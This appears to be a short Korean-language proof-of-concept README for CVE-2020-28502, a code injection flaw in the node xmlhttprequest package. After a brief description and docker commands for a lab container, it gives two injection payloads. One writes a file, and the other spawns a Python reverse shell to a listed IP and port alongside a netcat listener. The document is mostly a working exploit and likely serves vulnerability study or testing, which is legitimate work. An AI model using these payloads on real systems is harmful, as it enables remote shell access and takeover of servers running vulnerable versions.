
CVE-2020-28502 node-XMLHttpRequest RCE
이는 xmlhttprequest 패키지 1.7.0 이전 버전 및 xmlhttprequest-ssl 패키지의 모든 버전에 영향을 미칩니다. 요청이 동기적으로 전송될 경우(xhr.open에서 async=False), xhr.send로 유입되는 악의적인 사용자 입력은 임의의 코드가 삽입되어 실행될 수 있습니다.

$ docker build -t cve-2020-28502 .
$ docker run --rm -p 3000:3000 cve-2020-28502

페이로드 제출
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//
$ nc -l 8888
ip 주소(192.168.0.25)를 로컬 ip 주소로 변경하세요
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//